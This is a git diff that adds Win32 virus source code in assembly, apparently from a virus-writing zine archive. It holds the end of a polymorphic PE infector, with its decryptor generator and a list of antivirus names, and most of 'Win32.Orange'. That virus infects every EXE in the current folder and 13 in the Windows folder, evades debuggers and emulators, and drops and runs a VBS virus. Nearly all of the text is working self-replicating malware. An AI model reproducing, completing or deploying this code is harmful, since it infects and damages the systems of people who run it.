*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +CreateZero: + call randomslow + test al, 11 + je short CreateZeroMov + + or al, al + js short CreateZeroSub +CreateZeroXor: + mov eax, edx + shl eax, 11 + or ax, 0C031h + jmp short CreateZeroCommon +CreateZeroSub: + mov eax, edx + shl eax, 11 + or ax, 0C029h +CreateZeroCommon: + or ah, dl + stosw + ret +CreateZeroMov: + push ecx + xor ecx, ecx + call CreateMov + pop ecx + ret + +; -------- + +CreateAdd: + mov al, 5 + cmp dl, 0 ; eax + je short EntryFromCreateSub2 + cmp ecx, 7Fh + jbe short CreateAddSX + cmp ecx, -80h + jb short CreateAddNoSX +CreateAddSX: + mov al, 83h + stosb + mov al, 0C0h +EntryFromCreateSub3: + or al, dl + stosb + mov al, cl + stosb + ret +CreateAddNoSX: + mov al, 81h + stosb + mov al, 0C0h +EntryFromCreateSub1: + or al, dl +EntryFromCreateSub2: + stosb + mov eax, ecx + stosd + ret + +; -------- + +CreateSub: + mov al, 2Dh + cmp dl, 0 ; eax + je short EntryFromCreateSub2 + cmp ecx, 7Fh + jbe short CreateSubSX + cmp ecx, -80h + jb short CreateSubNoSX +CreateSubSX: + mov al, 83h + stosb + mov al, 0E8h + jmp short EntryFromCreateSub3 +CreateSubNoSX: + mov al, 81h + stosb + mov al, 0E8h + jmp short EntryFromCreateSub1 + +; -------- + +CreateMov: + mov al, 0B8h + jmp short EntryFromCreateSub1 + +; -------- + +CreateInc: + mov al, 40h +EntryFromDec: + or al, dl + stosb + ret + +; -------- + +CreateDec: + mov al, 48h + jmp short EntryFromDec + +; -------- + +CreatePush: + mov al, 50h + jmp short EntryFromDec + +; -------- + +CreateXor8: + or dl, dl + je short CreateXorAL + mov ax, 0F080h + or ah, dl + stosw + jmp short CreateXor8Common +CreateXorAL: + mov al, 34h + stosb +CreateXor8Common: + dec ebx + dec ebx + mov byte ptr [ebx], 34h +EntryFromCreateAdd8: + call randomfast + stosb + mov byte ptr [ebx+1], al + ret + + +CreateAdd8: + or dl, dl + je short CreateAdd8AL + mov ax, 0C080h + or ah, dl + stosw + jmp short CreateAdd8Common +CreateAdd8AL: + mov al, 04h + stosb +CreateAdd8Common: + dec ebx + dec ebx + mov byte ptr [ebx], 2Ch + jmp short EntryFromCreateAdd8 + + +CreateRol8: + sub ebx, 3 + mov ax, 0C8C0h + mov word ptr [ebx], ax + and ah, 0F7h + or ah, dl + stosw +RolNoGood: + call randomfast + and al, 7 + jz RolNoGood + stosb + mov byte ptr [ebx+2], al + ret + + +CreateSub8: + or dl, dl + je short CreateSub8AL + mov ax, 0E880h + or ah, dl + stosw + jmp short CreateSub8Common +CreateSub8AL: + mov al, 2Ch + stosb +CreateSub8Common: + dec ebx + dec ebx + mov byte ptr [ebx], 04h + jmp short EntryFromCreateAdd8 + + +; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +; Mid-Level Functions +; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +CreateMidInit: + call randomslow + or al,al + js short CreateInitZAdd + call CreateMov + ret +CreateInitZAdd: + test al, 1 + je short CreateInitSub + call CreateZero + call CreateAdd + ret +CreateInitSub: + call CreateZero + neg ecx + call CreateSub + ret + +;---------- + +CreateMidInc: + call randomslow + or al,al + js short CreateMidIncAdd + call CreateInc ; Inc + ret +CreateMidIncAdd: + push ecx + xor ecx,ecx + inc ecx + test al, 1 + jz short CreateMidIncSub +EntryFromMidDec_Add: + call CreateAdd ; Add 1 + jmp short CreateMidIncDone +CreateMidIncSub: ; Sub -1 + neg ecx +EntryFromMidDec_Sub: + call CreateSub +CreateMidIncDone: + pop ecx + ret + +;---------- + +CreateMidDec: + call randomslow + or al,al + js short CreateMidDecSub + call CreateDec + ret +CreateMidDecSub: + push ecx + xor ecx,ecx + inc ecx + test al, 1 + jnz short EntryFromMidDec_Sub +CreateMidDecAdd: + neg ecx + jmp short EntryFromMidDec_Add + + + +; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +; Complex Functions +; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +CreateLoadMem: + mov al, dl + shl eax, 11 + or ax, 008Ah + or ah, cl + stosw + mov dl, cl + call CreateMidInc + ret + +CreateStoreMem: + mov al, dl + shl eax, 11 + or ax, 0088h + or ah, cl + stosw + mov dl, cl + call CreateMidInc + ret + + +CreateSourceInit: + mov dl, PolySourceReg+ebp + mov eax, LastSectionEntryPtr+ebp + mov ecx, [eax].sec_VirtualAddress + add ecx, [eax].sec_SizeOfRawData + add ecx, [esi].ImageBase + call CreateMidInit + ret + +CreateDestInit: + mov dl, PolyDestReg+ebp + mov eax, DataSectionEntryPtr+ebp + mov ecx, [eax].sec_VirtualAddress + add ecx, [esi].ImageBase + call CreateMidInit + test byte ptr PolyFlag+ebp, 1 + jnz short CreateDestInitDone + call CreatePush +CreateDestInitDone: + ret + +CreateCntrInit: + mov dl, PolyCntrReg+ebp + mov ecx, VIRUSCODESIZE + call CreateMidInit + ret + +MarkLoop: + mov LoopLocation+ebp, edi + ret + +CreateLoad: + mov dl, PolyWorkReg+ebp + mov cl, PolySourceReg+ebp + or dl, dl + jne short CreateLoadMemCall + cmp cl, 6 + jne short CreateLoadMemCall + mov al, 0ACh + stosb + ret +CreateLoadMemCall: + call CreateLoadMem + ret + +CreateStore: + mov dl, PolyWorkReg+ebp + mov cl, PolyDestReg+ebp + or dl, dl + jne short CreateStoreMemCall + cmp cl, 7 + jne short CreateStoreMemCall + mov al, 0AAh + stosb + ret +CreateStoreMemCall: + call CreateStoreMem + ret + +CreateLoop: + mov dl, PolyCntrReg+ebp + mov al, 0E2h + cmp dl, 1 + je short MakeLoopCommon +LoopNotECX: + call CreateMidDec + mov al, 75h +MakeLoopCommon: + stosb + mov eax, LoopLocation+ebp + sub eax, edi + dec eax + stosb + cmp eax, -80h + jb MakePolyError + ret + +CreateGotoVirus: + test byte ptr PolyFlag+ebp, 1 + jz short CreateGotoVirusRet + mov al, 0E9h + stosb + mov eax, DataSectionEntryPtr+ebp + mov eax, [eax].sec_VirtualAddress + mov ecx, EmptyCodeSecRVA+ebp + sub eax, ecx + mov ecx, edi + sub ecx, PolySizeCount+ebp + add ecx, 4 + sub eax, ecx + stosd + ret +CreateGotoVirusRet: + mov al, 0C3h + stosb + ret + +InstructInitTable: + dd offset CreateSourceInit + dd offset CreateDestInit + dd offset CreateCntrInit +CreateInitCode: + xor ecx, ecx +CreateInitLoop: + call randomslow + and eax, 3 + jz short CreateInitLoop + dec eax + bts ecx, eax + jc short CreateInitLoop + mov eax, [ebp+4*eax+offset InstructInitTable] + add eax, ebp + push ecx + call eax + pop ecx + cmp cl, 7 + jne short CreateInitLoop + ret + +SelectRegs2: + call randomslow + mov PolyFlag+ebp, al + mov dl, 00110000b +GetWork2: + call randomfast + or al, al + js short PickRandWork2 + test dl, 1 + jnz short PickRandWork2 + mov byte ptr PolyWorkReg+ebp, 0 + or dl, 1 + jmp short GetSource2 +PickRandWork2: + call GetFreeRegister8 + mov PolyWorkReg+ebp, al +GetSource2: + call randomfast + or al, al + js short PickRandSource2 + test dl, 40h + jnz short PickRandSource2 + mov byte ptr PolySourceReg+ebp, 6 + or dl, 40h + jmp short GetCntr2 +PickRandSource2: + call GetFreeRegister + mov PolySourceReg+ebp, al +GetCntr2: + call randomfast + or al, al + js short PickRandCntr2 + test dl, 2 + jnz short PickRandCntr2 + mov byte ptr PolyCntrReg+ebp, 1 + or dl, 2 + jmp short GetDest2 +PickRandCntr2: + call GetFreeRegister + mov PolyCntrReg+ebp, al +GetDest2: + call randomfast + or al, al + js short PickRandDest2 + test dl, 80h + jnz short PickRandDest2 + mov byte ptr PolyDestReg+ebp, 7 + or dl, 80h + jmp short SelectRegsDone2 +PickRandDest2: + call GetFreeRegister + mov PolyDestReg+ebp, al +SelectRegsDone2: + ret + +CreateAddInECX: + test byte ptr PolyFlag+ebp, 2 + jnz short SelectRegsDone2 + mov al, PolyCntrReg+ebp + cmp al, 4 + jae short SelectRegsDone2 + shl eax, 11 + or ax, 0C000h + or ah, PolyWorkReg+ebp + stosw + mov ecx, PolyEncryptPtr+ebp + dec ecx + dec ecx + mov ax, 0C828h + mov word ptr [ecx], ax + mov PolyEncryptPtr+ebp, ecx + ret + + +GetFreeRegister8: + call randomfast + and al, 7 + mov ah, 1 + xchg ecx, eax + test cl, 4 + jnz short UpperRegister8 + rol ch, cl +GetReg8Common: + xchg ecx, eax + test dl, ah + jnz GetFreeRegister8 + or dl, ah + ret +UpperRegister8: + and cl, 3 + rol ch, cl + or cl, 4 + jmp GetReg8Common + +GetFreeRegister: + call randomfast + and eax, 7 + bts edx, eax + jc GetFreeRegister + ret + + +EncryptOpTable: + dd offset CreateXor8 + dd offset CreateAdd8 + dd offset CreateRol8 + dd offset CreateSub8 + + db 45 dup (?) ; Hold encryption code. +OpcodeStack: + ret + +CreateEncryption: + mov byte ptr OpcodeFlag+ebp, 0 + lea ebx, OpcodeStack+ebp + call randomslow + xchg eax, ecx + and ecx, 7 + inc ecx +MakeEncryptOps: + call randomslow + and eax, 03h + cmp OpcodeFlag+ebp, al + je short MakeEncryptOps + mov OpcodeFlag+ebp, al + mov eax, [ebp+4*eax+offset EncryptOpTable] + add eax, ebp + mov dl, PolyWorkReg+ebp + call eax + loop MakeEncryptOps + mov PolyEncryptPtr+ebp, ebx + ret + + +; -***********************************- +; Psuedo Random Number Generator +; -***********************************- +randomslow: +if DEBUG + jmp short randomfast +endif + push edi + lea edi, CurrentTime.ft_dwHighDateTime+ebp + call RandomCommon + pop edi + ret + +randomfast: + push edi + lea edi, CurrentTime.ft_dwLowDateTime+ebp + call RandomCommon + pop edi + push ecx + push edx + mov ecx, eax + jmp short RandPentiumExt +RandReturn: + pop edx + pop ecx + ret +RandPentiumExt: + db 0Fh, 31h ; rdtsc instruction (possible exceptn) + jmp $+2 ; should add SEH handler, + xor eax, ecx ; but I just don't care anymore + jmp short RandReturn + +RandomCommon: + push ecx + push edx + push ebx + mov eax, dword ptr [edi] + cdq + mov ecx, 44488 + idiv ecx + push edx + mov ecx, 3399 + mul ecx + xchg eax, ebx + pop eax + mov ecx, 48271 + mul ecx + sub eax, ebx + stosd + jnl short RandTooLow + add eax, 7FFFFFFFh +RandTooLow: + dec eax + pop ebx + pop edx + pop ecx + ret + +; +; esi = Function names +; edi = address destination +; ebx = handle of Lib +; +; returns: +; carry flag clear if ok, set if error +FillImports: + lodsb + movzx ecx, al + jecxz FillImpDone + push esi + add esi, ecx + call _GetProcAddress+ebp, ebx + or eax,eax + jz short FillImpFail + stosd + jmp short FillImports +FillImpDone: + clc + ret +FillImpFail: + stc + ret +include adecode.asi + +; -==============================- +; Initialized Data +; -==============================- + +if DEBUGROOTDIR + RootDir db 'GOATS',0 + else + RootDir dd '\',0 + endif +FileMaskAny db '*.*',0 +FileMaskExe db '*.EXE',0 +nKernel32 db 'KERNEL32',0 +nExitProcess db 'ExitProcess',0 +nGetModuleHandle db 'GetModuleHandleA',0 +AVNames db 3,'AVP' + db 4,'SCAN' + db 6,'FINDVI' + db 2,'F-',0 +CRCNames db 13,'ANTI-VIR.DAT',0 + db 11,'CHKLIST.MS',0 + db 8,'AVP.CRC',0 + db 8,'IVB.NTZ',0 + db 0 + +nGetProcAddr db 'GetProcAddress',0 +InfFunctions: + db 12,'CreateFileA',0 + db 19,'CreateFileMappingA',0 + db 14,'MapViewOfFile',0 + db 16,'UnmapViewOfFile',0 + db 12,'CloseHandle',0 + db 15,'SetFilePointer',0 + db 10,'WriteFile',0 + db 24,'GetSystemTimeAsFileTime',0 + db 21,'GetCurrentDirectoryA',0 + db 21,'SetCurrentDirectoryA',0 + db 15,'FindFirstFileA',0 + db 14,'FindNextFileA',0 + db 10,'FindClose',0 + db 19,'SetFileAttributesA',0 + db 12,'SetFileTime',0 + db 12,'ExitProcess',0 + db 12,'DeleteFileA',0 + db 21,'GetWindowsDirectoryA',0 + db 13,'LoadLibraryA',0 + db 12,'FreeLibrary',0 + db 0 + +BakaWav: +include baka.bin + +bakafile db '\baka.wav',0 +RegKey db '.DEFAULT\AppEvents\Schemes\Apps\.Default\AppGPFault\.Current',0 + +RegFunctions: + db 12,'RegOpenKeyA',0 + db 12,'RegCloseKey',0 + db 13,'RegSetValueA',0 + db 0 + + +VirusInitEnd: + +_GetProcAddress dd ? +InfDest: ; Have to be in Same order as above +_CreateFileA dd ? +_CreateFileMappingA dd ? +_MapViewOfFile dd ? +_UnmapViewOfFile dd ? +_CloseHandle dd ? +_SetFilePointer dd ? +_WriteFile dd ? +_GetSystemTimeAsFileTime dd ? +_GetCurrentDirectoryA dd ? +_SetCurrentDirectoryA dd ? +_FindFirstFileA dd ? +_FindNextFileA dd ? +_FindClose dd ? +_SetFileAttributesA dd ? +_SetFileTime dd ? +_ExitProcess dd ? +_DeleteFileA dd ? +_GetWindowsDirectoryA dd ? +_LoadLibraryA dd ? +_FreeLibrary dd ? +RegFuncDest: +_RegOpenKeyA dd ? +_RegCloseKey dd ? +_RegSetValueA dd ? + +SFCLib dd ? +_SfcIsFileProtected dd ? + +SearchHnd dd ? +RegHnd dd ? + +NumOfNames dd ? +ExitProcessRVA dd ? +GetModuleHandleRVA dd ? +NewVirtualSizeOfData dd ? +EmptyCodeSecRVA dd ? +EmptyCodeSecAddr dd ? +EmptyCodeSecSize dd ? +LastSectionEntryPtr dd ? +DataSectionEntryPtr dd ? +BytesWritten dd ? +FoundExitCall dd ? + +ExeGoodCount dd ? +ExeBadCount dd ? +NonExeCount dd ? +ExeSizesPtr dd ? +DirCount dd ? + +LetterCount db ? +LastLetter db ? +NumInfected db ? +AVCRCFlag db ? + +; Regs ok are: 0-3,6,7 (eax, ecx, edx, ebx, esi, edi) +PolyFlag db ? +PolySizeCount dd ? +LoopLocation dd ? +PolyEncryptPtr dd ? +StackRestore dd ? +PolySourceReg db ? +PolyDestReg db ? +PolyCntrReg db ? +PolyWorkReg db ? +OpcodeFlag db ? + + + + +DirBuf db 256 dup (?) +CurrentTime FILETIME ? +FindFile WIN32_FIND_DATA +ExeSizes dd MAXEXEPERDIR dup (?) +buffer db (MAX_PATH+10) dup (?) +PolyedVirus db VIRUSCODESIZE dup (?) + +VirusEnd: + + + + end HOST + + COMMENT ` ---------------------------------------------------------------- )=- + -=( Natural Selection Issue #1 --------------- (c) 2002 Feathered Serpents )=- + -=( ---------------------------------------------------------------------- ) ` diff --git a/Win32/Win32.Orange.asm b/Win32/Win32.Orange.asm new file mode 100644 index 00000000..fd1e4d74 --- /dev/null +++ b/Win32/Win32.Orange.asm @@ -0,0 +1,1037 @@ +; +; -Greetz to all 29Aerz,and iKX'erz- +; +; Win32.Orange [created by Ebola] paired with VBS/Orange2 +; +; Type: Win32 PE infector +; Size: Approx 3.0KB +; Encrypted: Yes (1 layer) +; Polymorphic: No +; Optimized: Yes, CRC api's and somewhat optimized opcodes (damn I need lessons from Super/29A:) +; Payload: None, but drops a VBS virus. +; Misc. Features: Drops a VBS virus file and executes it. Several Anti-Debug,Anti-Emu features +; and last it uses lots of SEH +; Infections: All files in current directory and 13 files in the windows directory. +; +; Alright I believe this is my 2nd win32 virus release, my first one is zipped up with a +; password that I don't remember :). Anyway, this direct infector infects all files in current +; directory and 13 files in windows directory. It drops a VBS/Virus (VBS/Orange2). +; +; What's next? Probably gonna make a worm in win32asm.. :)) +; +; Feelings (huh? I have no idea:) +; +; Even if you don't live in the U.S., I feel very vehement about what Bin Laden did +; to our country. I know everyone has their own opinions and I respect those opinions +; and I don't want to get into a little political war about how unfair the U.S. can +; be to other countries, but I think his billionaire ass should burn in hell. Speekin +; of BILLionaire ass, I will not be held responsible for any damages or any havoc that +; this software causes to any systems. I do not condone nor allow spreading of viruses +; so by spreading this virus you are involving yourself into the legal system and I will +; not go to court and support you.. In other words, I hold absolutely no responsibility +; towards this software and I only support beta testing. I made this out of experimentation +; on my computer and if you cause worldwide computer failure, I don't care - It's your +; fault, It's your bad, I have ABSOLUTELY NOTHING TO DO WITHIT!!! +; +; Okay, enough rambling, on with the source code, enjoy if you wish +; +; ONE MORE THING: Macro Assembler is the only good software M$ has ever made (AGAIN, NO +; POLITICAL BATTLES PLEASE.. :) +; +;** To be compiled with Masm 6.0: Check win32asm.cjb.net +;** Order of PUSHAD: (E)AX [1Ch], (E)CX [18h], (E)DX [14h], (E)BX [10h], (E)SP [0Ch], (E)BP [8h], (E)SI [4h], (E)DI [0h] + +.386p +.model flat, stdcall +option casemap :none + +include \masm32\include\windows.inc + + @Delta_Handle MACRO + + call markit + markit: + pop ebp + sub ebp,offset markit + + ENDM + +OS_WIN98 equ 1 +OS_WINNT equ 2 + +.code +start: +virus_start = $ + + pushad + ASSUME FS: nothing + + ;** kill off some debuggers + call setupseh + mov esp,[esp+08h] + jmp fin +setupseh: + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + xor eax,eax + mov dword ptr [eax],00h ; BAM! + +fin: + xor edx,edx + pop dword ptr fs:[edx] ;** clear up the stack + pop edx + + ;** should be zero + mov ecx,fs:[20] + jecxz choker + + ;** locks em up all the time, muahaha + cli + jmp $-1 + +choker: + popad + + ;** First we must get the delta to access our data + @Delta_Handle + + or ebp,ebp + jz monkey + +mov esi,monkey +add esi,ebp + +mov ecx,virus_end-monkey +push esi +pop edi + +decrypt: +lodsb +not al ;not al +stosb +dec ecx +jecxz monkey +jmp decrypt + +monkey = $ + ;** Next we find the kernel in memory + mov eax,[esp] + and eax,0FFFF0000h ; Just get the 32bit high word + +loopgetkern: + + sub eax,1000h ; Surf throught the pages + mov bx,word ptr [eax] + not bx ; protect from having 'MZ' in our code + cmp bx,not 'ZM' ; and check for a MZ header + jnz loopgetkern ; no, we keep checking + + mov [ebp+kernel],eax +ring3: + xchg eax,ebx ;** silly anti-emu + mov ebx,ds ;aahh i love it + push ebx + pop ds ; playing with ds is surefire to throw something off + xchg eax,ebx + +;** Find our current OS that we're on (NOTE: this may not work on WinME, i am not sure) +; works with Win98, Win95, WinNT, Win2000 though +; Taken from Billy Belcebu's great and huge virus writing guide, thanx billy! + + mov ecx,cs + xor cl,cl + + jecxz wNT + + mov [ebp+CurrentOS],OS_WIN98 + jmp prepare +wNT: + mov [ebp+CurrentOS],OS_WINNT + +;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#* +; OK, we have our OS down, next we find our API's +;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#* + +prepare: + + mov esi,[ebp+kernel] + mov ebx,esi + mov esi,[esi+03ch] + add esi,ebx + + mov ax,word ptr [esi] + not ax ; again, hide the 'PE' in the file as AV looks for this + cmp ax,not "EP" ; check for valid PE file + jnz no_kernel + + add esi,78h ; Get to exports address + mov esi,[esi] ; go there + add esi,ebx + + lea edi,[ebp+NumberOfNames] ; we are going to get info from exports table + + add esi,018h + + lodsd ; Get number of names, + stosd ; store it. + lodsd ; Get RVA of addresses, + stosd ; store it. + lodsd ; Get RVA of Names, + stosd ; store it. + lodsd ; Get RVA of Ordinals, + stosd ; store it. + ; total 8 bytes :) usually takes alot more + +;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#* +; Locate our API's **** +;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#* + + lea esi,[ebp+CRC32_PROC] + mov ecx,[esi] + lea edi,[ebp+GetProcAddress] + +loop_getem: + call Get_APICRC32 + stosd + + add esi,4 + mov ecx,[esi] + + jecxz done_finding_api + + jmp loop_getem + +;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#* +;** Next we do some more tricks to get rid of +; debuggers or emulators +;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#* + +done_finding_api: + + call dword ptr [ebp+IsDebuggerPresent] ; find application level debuggers + jz proceed ; none, proceed to SoftICE + + ; Put anti debug stuff here + cli + jmp $-1 ; hang the damn bitches + + +proceed: + + call CheckSoftICE ; checks if SoftICE for 95/98/NT is in memory + or eax,eax ; check EAX + jz LoadingSequence ; load it up :) + + jmp leaveth ; SoftICE detected, we're outta here + + jmp LoadingSequence + +;** Check for softice presence + +CheckSoftICE: + +push 00h +push 80h +push 03h +push 00h +push 01h +push 0c0000000h +lea esi,[ebp+SoftICE_Win9X] +push esi +call [ebp+CreateFileA] + +inc eax +jnz si9x ; SoftICE for Win9X is active +dec eax + +push eax +call [ebp+CloseHandle] + +;--- check for NTice + +push 00h +push 80h +push 03h +push 00h +push 01h +push 0c0000000h +lea esi,[ebp+SoftICE_WinNT] +push esi +call [ebp+CreateFileA] + +inc eax +jnz siNT ; SoftICE for WinNT is active +dec eax + +push eax +call [ebp+CloseHandle] + +xor eax,eax +ret + +si9x: + mov eax,01h ; SI for Win95/98 + ret +siNT: + mov eax,02h ; for NT/2000 + ret + +;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#* +;** Loading of virus components +Inf32_Counter dd 0 +NumPasses dd 0 +LoadingSequence: + + dec dword ptr [ebp+Inf32_Counter] ; FFFFFFFF infections: basically every file + mov [ebp+NumPasses],2 ; 1st pass: curdir 2nd: windir + +infpass: + ;** Setup an SEH handler to protect our infection routine + call SetupSEH + mov esp,[esp+08h] + jmp DoneSEH +SetupSEH: + xor eax,eax + push dword ptr fs:[eax] + mov fs:[eax],esp + + ;+-+-+-+-+-+-+-+-+-+-+- + + lea edi,[ebp+FindData] + push edi + lea eax,[ebp+FileMask] + push eax + + call [ebp+FindFirstFileA] ; find the first file... + + inc eax + jz leaveth + dec eax + mov ebx,eax + +infect: push ebx ; save findhandle + + push dword ptr [edi+20h] ; push the filesize + add edi,02Ch ; point to filename and.. + push edi ; push + call InfectFile ; Infect the file! + + pop ebx ; restore FindHandle (we modify EBX) + + dec dword ptr [ebp+Inf32_Counter] + jz __next + + lea edi,[ebp+FindData] ; re-initialize EDI + push edi + + add edi,02Ch ; clear filename field (so no overwriting is done) + xor al,al + mov ecx,256 + rep stosb + + mov edi,[esp] ; restore EDI + + push ebx ; find the next valid file + call [ebp+FindNextFileA] + + or eax,eax + jnz infect + + push ebx + call [ebp+FindClose] + + ;+-+-+-+-+-+-+-+-+-+-+- + +DoneSEH: + xor eax,eax + pop dword ptr fs:[eax] + pop eax + +__next: + dec dword ptr [ebp+NumPasses] + jz weredone + + push 128 + lea edi,[ebp+Buffer] + push edi + call [ebp+GetWindowsDirectoryA] + + push edi + call [ebp+SetCurrentDirectoryA] + + mov [ebp+Inf32_Counter],13 + jmp infpass + +weredone: + + call InstallVBS ; extract the VBS file to the current directory + + jmp leaveth + +;********BEGINNING OF INFECTOR*************** + +InfectFile: + pop eax ; return address + pop esi ; file name + pop ecx ; file size +; pop edx ; file attribs + + mov [ebp+addr_ret],eax + mov [ebp+filename],esi + mov [ebp+file_size],ecx +; mov [ebp+file_attr],edx + + ;save the old entry point and imagebase + mov ebx,[ebp+ImageBase] + mov [ebp+ib],ebx + mov ebx,[ebp+OldEIP] + mov [ebp+oe],ebx + ;**--** + + push ecx ; save it + + push 080h ; wipe attributes off + push esi + call [ebp+SetFileAttributesA] + + + + call Open ; i dont even bother checking if its valid, we find out after + mov ecx,[esp] ; it has been mapped + xchg eax,ebx + call GenMap ; map it in memory + xchg eax,ebx + mov ecx,[esp] + call MapIt + + pop ecx + + or eax,eax + jz close + + + + cmp word ptr [eax],'ZM' ; is it a valid exe? + jnz close + + mov esi,eax + mov esi,[esi+03ch] ; get to pe header + add esi,eax + + cmp word ptr [esi],'EP' ; is it a PE/exe? + jnz close + + cmp dword ptr [esi+04Ch],77661212h ; are we infected? + jz close + + push dword ptr [esi+03Ch] ; save file alignment + + + + call CLOSEPROC ; close file + + mov eax,[ebp+file_size] ; put old size in eax + pop ecx + add eax,virus_end-virus_start ; make it the new size + + call Factor ; factor it into the alignment + + mov [ebp+file_size],eax ; store it again + xchg ecx,eax + + + + push ecx + mov esi,[ebp+filename] ; reopen etc.... + call Open + xchg eax,ebx + mov ecx,[esp] + call GenMap + xchg eax,ebx + mov ecx,[esp] + call MapIt + pop ecx + or eax,eax ; check make sure its valid + jz close + + ; proceed infection + + mov esi,eax + push esi + pop ebx + mov esi,[esi+03ch] + add esi,ebx + movzx eax,word ptr [esi+06h] ; number of sections + dec eax ; - 1 + imul eax,eax,28h ; gets us to last section + mov ebx,esi + add esi,78h+(8*10h) ; blah.. + add esi,eax + + + + or dword ptr [esi+24h],0a0000020h ; code,readable,writable + mov ecx,[esi+10h] + push ecx + mov edx,[esi+14h] + + mov eax,[esi+0Ch] + add eax,ecx + + mov edx,[ebx+28h] ; Old EIP + mov [ebp+OldEIP],edx + mov edx,[ebx+34h] ; image base + mov [ebp+ImageBase],edx + + mov [ebx+28h],eax ; the new eip is stored + + mov eax,ecx + add eax,virus_end-virus_start + mov ecx,[ebx+03Ch] + call Factor + + mov [esi+10h],eax ; set the new sizes, this is physical size + mov [esi+08h],eax ; virtual size + mov edx,eax + + mov ebx,[ebp+MappedView] ; need a handle again + + mov edi,[esi+14h] ; Pointer to Raw Data (in PE header) + add edi,ebx ; point it to the end of the file (to write our virus) + pop ecx ; size of last section + add edi,ecx ; point to the end of last section + push esi ; save ESI + lea esi,[ebp+virus_start] ; ... you should know this :) + mov ecx,virus_end-virus_start ; setup the length of the virus + push ecx + + rep movsb ; copy the virus there! + + pop ecx + + sub ecx,monkey-virus_start + sub edi,ecx + mov esi,edi + +encrypt: +lodsb +not al +stosb +dec ecx +jecxz @bbcr +jmp encrypt + +@bbcr: + pop esi ; restore ESI + + mov eax,ebx ; fix it to point to PE header + mov ebx,[ebx+03Ch] ; e_lfanew + add ebx,eax ; normalize + + mov eax,[esi+0Ch] ; VA address of last section + add eax,edx ; add our new length + mov [ebx+50h],eax ; and we have size of image + + mov dword ptr [ebx+04Ch],77661212h ; mark it as infected + + ;** next we restore old image base and entrypoint + mov ebx,[ebp+ib] + mov eax,[ebp+oe] + mov [ebp+ImageBase],ebx + mov [ebp+OldEIP],eax + ;**--** + +close: + call CLOSEPROC + jmp setattr + +setattr: +push dword ptr [ebp+file_attr] +push dword ptr [ebp+filename] +call [ebp+SetFileAttributesA] + +exit_inf: + push [ebp+addr_ret] + + ret + +;*********************************************** +; Infectors data, i just keep it in the proc +;*********************************************** + +dataset: + +addr_ret dd 0 +file_size dd 0 +file_attr dd 80h + +FileHandle dd 0 +MappedFile dd 0 +MappedView dd 0 + +filename dd 0 + +ib dd 0 +oe dd 0 +;*********************************************** +; Infectors helper functions +;*********************************************** + +Factor: +pushad +xor edx,edx +push eax +div ecx +pop eax +sub ecx,edx +add eax,ecx +mov [esp+01Ch],eax +popad +ret + +CLOSEPROC: +push dword ptr [ebp+MappedView] +call [ebp+UnmapViewOfFile] + +push dword ptr [ebp+MappedFile] +call [ebp+CloseHandle] + +push dword ptr [ebp+FileHandle] +call [ebp+CloseHandle] +ret + + +;** open file for read/write ESI = FileName +Open: + xor eax,eax + push eax + push eax + push 3h + push eax + push 1h + push 0C0000000h + push esi + call [ebp+CreateFileA] + mov [ebp+FileHandle],eax + ret +; ECX=Size EBX=FileHandle +GenMap: + xor eax,eax + push eax + push ecx + push eax + push 04h + push eax + push ebx + call [ebp+CreateFileMappingA] + mov [ebp+MappedFile],eax + ret + +; ECX=Size EBX=Handle returned by GenMap +MapIt: + xor eax,eax + push ecx + push eax + push eax + push 02h + push ebx + call [ebp+MapViewOfFile] + mov [ebp+MappedView],eax + ret + +;*********END OF INFECTOR**************** + +InstallVBS proc + + lea esi,[ebp+vbsfile] + + xor eax,eax + push eax + push eax + inc eax + push eax + dec eax + push eax + inc eax + push eax + push 0c0000000h + push esi + call [ebp+CreateFileA] + + mov [ebp+FileHandle],eax + + push eax + + lea edi,[ebp+Buffer] + + push 00h + push edi + push dword ptr [ebp+sizevbs] + lea esi,[ebp+vbsdata] + push esi + push eax + call [ebp+WriteFile] + + call [ebp+CloseHandle] + + ;############################ + + lea esi,[ebp+_Shell32] + push esi + call [ebp+LoadLibraryA] + + push eax + lea esi,[ebp+_ShellExecute] + push esi + push eax + call [ebp+GetProcAddress] + + push 01h + push 00h + push 00h + lea esi,[ebp+vbsfile] + push esi + lea esi,[ebp+_OpenExecute] + push esi + push 00h + call eax + + call [ebp+FreeLibrary] + + ;############################ + + ret + +InstallVBS endp + +;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#* +;** Leave + +no_kernel: +leaveth: + or ebp,ebp + jz firstgeneration + + mov eax,00400000h +ImageBase equ $-4 + add eax,00001000h +OldEIP equ $-4 + + jmp eax + +firstgeneration: + push 0 + call [ebp+ExitProcess] + +;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#* +;** Error handling and must-exit thingy's +;#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#*#*#*#-#*#* + +;--------------------------------------- +; Different functions we use ******* +;--------------------------------------- + +CRC32 proc + cld + xor ecx,ecx ; Optimized by me - 2 bytes + dec ecx ; less + mov edx,ecx + NextByteCRC: + xor eax,eax + xor ebx,ebx + lodsb + xor al,cl + mov cl,ch + mov ch,dl + 